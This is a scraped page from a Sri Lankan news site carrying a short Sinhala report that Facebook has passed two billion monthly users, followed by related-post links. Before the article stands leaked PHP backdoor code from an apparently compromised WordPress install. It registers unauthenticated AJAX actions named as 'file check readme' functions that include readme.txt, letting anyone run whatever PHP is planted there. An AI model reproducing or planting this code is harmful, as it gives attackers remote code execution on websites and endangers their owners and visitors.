if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } facebook අලුත් පිම්මක් පනී - mediahumanrights.lk
mediahumanrights.lk
International News News

facebook අලුත් පිම්මක් පනී

ෆේස්බුක් සමාජජාල මාධ්‍ය පරිශීලනය කරන සංඛ්‍යාව පිළිබඳ අලුත්ම දත්ත වාර්තා මේ වන විට හෙළි කර තිබෙනවා.
ඒ අනුව ෆේස්බුක් සමාජජාල මාධ්‍ය පරිශීලනය කරන සංඛ්‍යාව බිලියන දෙකක් දක්වා ඉහළ ගොස් ඇති බවයි වාර්තා වෙන්නේ.
එම සමාගම පවසන්නේ මේ වනවිට ලෝක ජනගහණයෙන් හතරෙන් එකකට ආසන්න සංඛ්‍යාවක් සෑම මාසයකම ෆේස්බුක් සමාජ ජාලය පරිශීලනය කරන බවයි.
ෆේස්බුක් සමාගම ආරම්භ කර වසර 13 කට පසුවයි එහි සාමාජික සංඛ්‍යාව බිලියන දෙකේ සීමාව ඉක්මවා ගියේ.
ෆේස්බුක් සමාජජාල මාධ්‍ය පරිශීලනය කරන සංඛ්‍යාව බිලියනයේ සීමාව පසුකර ගියේ 2012 වසරේ ඔක්තෝම්බර් මාසයේයි.
ඉතිරි බිලියනයක සංඛ්‍යාව ෆේස්බුක් වෙත පැමිණීමට ගතවී ඇත්තේ වසර 5 ක් වැනි කෙටිකාලයක්වීමද විශේෂත්වයක්.
පවතින තත්ත්වය හේතුවෙන් ෆේස්බුක් සමාගම ඉකුත් මාසයේදි කුළී පදනම මත අලුතින් සේවකයින් තුන්දහසක්ද සේවයට බඳවා ගත්තා.
(under the courtesy of nethfm news web)

Related posts

ඇමරිකාවෙන් ආනයනික තීරු බද්ද බින්දුව කර අර්බුදයෙන් ගැලවෙන්නැයි කියයි..

Shiran Viraj

රාජිත නම් දේශපාලන මහෝඝය සිරකල ගෝටාභය දැනටමත් පරාදයි.. මේ පාලනය එලවන්න සියළු බලවේග දැනටත් කෑමොර දෙනවා..

Shiran Viraj

නව මහ බැංකු අධිපතිතුමනි ඔබ නිවැරදයි..- හර්ෂ

Shiran Viraj